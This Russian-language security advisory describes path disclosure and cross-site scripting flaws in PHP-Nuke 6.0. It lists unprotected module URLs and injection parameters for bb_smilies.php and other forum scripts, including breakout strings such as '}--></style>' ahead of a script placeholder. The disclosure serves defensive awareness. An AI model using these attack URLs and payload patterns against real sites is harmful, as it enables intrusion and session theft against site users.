К некоторым включаемым сценариям, которые содержат различные уязвимости, можно обратится напрямую.
Большинство файлов в PHPNuke включается в модули modules.php или index.php. Чтобы предотвратить прямой доступ к
таким сценариям, PHPNuke содержит два способа защиты.
Первый (например, в modules/Downloads/index.php):
if (!eregi("modules.php", $PHP_SELF)) {
die ("You can't access this file directly...");
}
Второй (например, в footer.php ) :
if (eregi("footer.php",$PHP_SELF)) {
Header("Location: index.php");
die();
}
Однако некоторые файлы не содержат такой защиты, при прямом обращении к ним существует несколько проблем безопасности:
Раскрытие пути
http://[target]/modules/Downloads/voteinclude.php
http://[target]/modules/Your_Account/navbar.php
http://[target]/modules/Forums/attachment.php
http://[target]/modules/Forums/auth.php
http://[target]/modules/News/comments.php
http://[target]/modules/Private_Messages/functions.php
http://[target]/modules/Private_Messages/index.php
http://[target]/modules/Private_Messages/read.php
http://[target]/modules/Private_Messages/reply.php
http://[target]/modules/Web_Links/voteinclude.php
http://[target]/modules/WebMail/contactbook.php?user=1
Раскрытие пути и межсайтовый скриптинг
http://[target]/modules/Forums/bb_smilies.php?name=[SCRIPT]
или http://[target]/modules/Forums/bb_smilies.php?Default_Theme=[SCRIPT]
или http://[target]/modules/Forums/bb_smilies.php?site_font=}--></style>[SCRIPT]
или http://[target]/modules/Forums/bb_smilies.php?bgcolor1=">[SCRIPT]
или с :
$sitename
$table_width
$color1
$forumver
- /modules/Forums/bbcode_ref.php с:
$name
$Default_Theme
$site_font
$sitename
$bgcolor2
$textcolor1
$bgcolor1
$forumver
- /modules/Forums/editpost.php, /modules/Forums/newtopic.php, /modules/Forums/reply.php, /modules/Forums/topicadmin.php,
/modules/Forums/viewforum.php с :
$name
- /modules/Forums/searchbb.php с :
$name
$bgcolor3
$bgcolor1
Уязвимость обнаружена в PHPNUKE 6.0.
